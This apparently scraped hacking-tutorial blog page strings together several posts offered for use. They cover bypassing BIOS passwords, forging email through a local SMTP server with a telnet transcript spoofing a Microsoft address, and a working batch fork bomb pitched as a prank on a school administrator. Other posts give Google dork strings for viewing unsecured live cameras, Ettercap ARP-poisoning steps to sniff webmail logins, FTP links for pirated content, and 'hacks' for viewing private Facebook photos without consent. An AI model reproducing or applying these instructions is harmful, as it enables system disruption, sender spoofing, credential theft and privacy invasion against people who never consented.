The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.

Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can remove the battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.

Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip

Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.

Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.

CHIPS P82C206 (square)

Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).

Code:

       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32

OPTi F82C206 (rectangular)

Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).

Code:

    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26

Dallas DS1287, DS1287A

Benchmarq bp3287MT, bq3287AMT

The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.

CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.

The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.

Code:

         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13

NOTE: Although these are 24-pin chips,

the Dallas chips may be missing 5 pins,

these are unused pins.

Most chips have unused pins,

though usually they are still present.

Dallas DS12885S

Benchmarq bq3258S

Hitachi HD146818AP

Samsung KS82C6818A

This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.

Short together pins 12 and 24.

Code:

5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd

Motorola MC146818AP

Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.

Code:

          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13

Replacing the chip

If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.

Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:WINDOWS, C:WINDOWSSYSTEM, or C:WINDOWSINF .

Key Disk for Toshiba laptops

Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.

Key protected cases

A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

Read More

How to send fake email / Email Forging

Most of the email forging tutorials on internet will teach us how to send fake email connecting to SMTP server of the ISP or any other domain. But this is not possible since these hacks will no longer work today because SMTP of remote server will reject any attempts for unauthorized access. Also many of the websites offer you to send fake email from their sites where none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. SMTP server is a simple software program which can be installed on your computer in few seconds. SMTP server allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server HERE. This is the SMTP server i am using in my tutorial. Once you download and install the server on your comp then you are all set to send fake email successfully.

PART A: CONFIGURING SMTP SERVER

Once you have installed the QK SMTP server on your comp you must perform the following configuration.

1. Click on “Settings” button on the main screen,the Settings window pops up

2. On Settings window click on “Basic Parameter” tab

3. Set binding IP to “127.0.0.1?

4. Set port to “25?

PART B: SENDING FAKE EMAIL (EMAIL FORGING)

1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored

2. Goto command prompt(Start-Accessories-Command prompt)

3. Type exactly as follows

C:>telnet 127.0.0.1 25

Here 127.0.0.1 is the default IP of every computer.25 is the port number. SO you are connecting to the SMTP server running on your own computer.This step is very important to send fake email.

NOTE: The IP 127.0.0.1 should not be substituted by any other IP.

Heres the snapshot of what you see after step 3. Click on it to enlarge

4. After typing the telnet command in the command prompt you get entry to the server which displays the following message. The response of a OK SMTP server is given below. Message within Green color is only explanation.

220 Welcome to QK SMTP Server 3

helo hacker (Type helo & any name followed by space)

250 Hello hacker (Server Welcomes You)

mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)

250 billg@microsoft.com Address Okay (Server gives a positive response)

rcpt to:admin@gmail.com (Type any valid recipient email address)

250 admin@gmail.com Address Okay (Server gives a positive response)

data (type this command to start input data)

354 Please start mail input

From:Gates <billg@microsoft.com>

To:admin@gmail.com

Date:Sat Jan 5,2008 9:45 PM

Subject:Test to send fake email

You can create as many headers followed by the “:” symbol.

NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data

<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]

250 Mail queued for delivery (Sever indicates that the email is ready for sending)

quit (Type this command to quit from server)

221 Closing connection. Good bye.

Connection to host lost

(You will get the above 2 lines of message after typing “quit” command)

(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****

Read More

How to make a Fork Bomb (Rabbit Virus)

Introduction

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

Read More

How to make a Virus File Undetected By Antivirus Programs

This video tutorial explains you in detail “how to make an infected file undetectable” just by doing some splitting and hexing!!

Read More

How to Hack into a Live Security Camera

Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just google these following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:

• inurl:”CgiStart?page=”


• inurl:/view.shtml


• intitle:”Live View / – AXIS


• inurl:view/view.shtml


• inurl:ViewerFrame?Mode=


• inurl:ViewerFrame?Mode=Refresh


• inurl:axis-cgi/jpg


• inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)


• inurl:view/indexFrame.shtml


• inurl:view/index.shtml


• inurl:view/view.shtml


• liveapplet


• intitle:”live view” intitle:axis


• intitle:liveapplet


• allintitle:”Network Camera NetworkCamera” (disconnected)


• intitle:axis intitle:”video server”


• intitle:liveapplet inurl:LvAppl


• intitle:”EvoCam” inurl:”webcam.html”


• intitle:”Live NetSnap Cam-Server feed”


• intitle:”Live View / – AXIS”


• intitle:”Live View / – AXIS 206M”


• intitle:”Live View / – AXIS 206W”


• intitle:”Live View / – AXIS 210?


• inurl:indexFrame.shtml Axis


• inurl:”MultiCameraFrame?Mode=Motion” (disconnected)


• intitle:start inurl:cgistart


• intitle:”WJ-NT104 Main Page”


• intitle:snc-z20 inurl:home/


• intitle:snc-cs3 inurl:home/


• intitle:snc-rz30 inurl:home/


• intitle:”sony network camera snc-p1?


• intitle:”sony network camera snc-m1?


• site:.viewnetcam.com -www.viewnetcam.com


• intitle:”Toshiba Network Camera” user login


• intitle:”netcam live image” (disconnected)


• intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!

Read More

Sniffing Tutorial

Hi, Today I am posting a tutorial on Sniffing which can be done using “BACKTRACK” . You can download Backtrack from here.

I prefer using Backtrack 3.0 Final version.

Well lets start with sniffing. If you don’t know what sniffing is, then click here.

Tools you need are:

Ettercap

nano

1. For SSL Dissection support (hotmail,gmail), you need to do this:

Open a shell, type: “nano /usr/local/etc/etter.conf”, use the down arrow until you reach “redir_command_on/off”, look at the linux part, your gonna need to uncomment:

Code:

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to:

Code:

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

after your done, press F2, Y, Return.

Now boot Ettercap: Menu –> Backtrack –> Spoofing –> Ettercap

Go to: Sniff –> Unified Sniffing –>ethX(what interface you want to sniff).

Then Press: Ctrl+S to scan hosts.

Then Go to: Mitm –> ARP poisoning, select sniff remote connections, and press ok.

Then Go to: Start –> Start Sniffing.

For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

When your done, go to Start –> Stop Sniffing, And go to Mitm –> Stop mitm attack(s)

Read More

Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites

Internet definitely has several unheard places also known as underground websites, few of these website offer users 100s and 1000s of softwares, games, movies and lot of Hacking Stuff for downloads. Though these sites are pretty tough to find, I was able to unearth more than 50+ FTP sites that allow users to download softwares, games, movies and lot of Hacking tools for free.

Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.

1. ftp://ftp.freenet.de/pub/filepilot/

2. ftp://193.43.36.131/Radio/MP3/

3. ftp://195.216.160.175/

4. ftp://207.71.8.54:21/games/

5. ftp://194.44.214.3/pub/music/

6. ftp://202.118.66.15/pub/books

7. ftp://129.241.210.42/pub/games/

8. ftp://clubmusic:clubmusic@217.172.16.3:8778/

9. ftp://212.174.160.21/games

10. ftp://ftp.uar.net/pub/e-books/

11. ftp://129.241.210.42/pub/games/

12. ftp://193.231.238.4/pub/

13. ftp://207.71.8.54/games/

14. ftp://194.187.207.98/video/

15. ftp://194.187.207.98/music/

16. ftp://194.187.207.98/soft/

17. ftp://194.187.207.98/games/

18. ftp://ftp.uglan.ck.ua/

19. ftp://159.153.197.74/pub

20. ftp://leech:l33ch@61.145.123.141:5632/

21. ftp://psy:psy@ftp.cybersky.ru

22. ftp://130.89.175.1/pub/games/

23. ftp://194.44.214.3/pub/

24. ftp://195.116.114.144:21/

25. ftp://64.17.191.56:21/

26. ftp://80.255.128.148:21/pub/

27. ftp://83.149.236.35:21/packages/

28. ftp://129.241.56.118/

29. ftp://81.198.60.10:21/

30. ftp://128.10.252.10/pub/

31. ftp://129.241.210.42/pub/

32. ftp://137.189.4.14/pub

33. ftp://139.174.2.36/pub/

34. ftp://147.178.1.101/

35. ftp://156.17.62.99/

36. ftp://159.153.197.74/pub/

37. ftp://193.140.54.18/pub/

38. ftp://192.67.63.35/

39. ftp://166.70.161.34/

40. ftp://195.161.112.15/musik/

41. ftp://195.161.112.15/

42. ftp://195.131.10.164/software

43. ftp://195.146.65.20/pub/win/

44. ftp://199.166.210.164/

45. ftp://195.46.96.194/pub/

46. ftp://61.136.76.236/

47. ftp://61.154.14.248/

48. ftp://62.210.158.81/

49. ftp://62.232.57.61/

50. ftp://212.122.1.85/pub/software/

51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

Read More

Top 10 Facebook Hacks

Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.

1.How to View the Album of Any User Even if it is Private

You can use this script to view a photo in the original album, even if you’re not friends with the person.

Get it Here

2. How to Remove Annoying Facebook Advertisement

Get rid of some of the Facebook advertising and sponsored by sections with this tool.

Get it Here

3. How to see Real Profiles from Public Pages

This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.

Get it Here

4. How to Undo Facebook Changes

If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.

Get it Here

5. How to View All the Photos from a Person

You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.

Get it Here

6. How to Find More Friends at Facebook

Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.

Get it Here

7. How to Share Files from Facebook

With this box widget, you can share files from your computer through Facebook. Isn’t it great?

Get it Here

8. How to Get a Job from Facebook

Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.

Get it Here

9. How to Tighten up the Privacy and still Maintain Communication Convenience

The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.

Get it Here

10 How to Cheat Facebook Texas Hold em Poker

This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.

Get it Here

Read More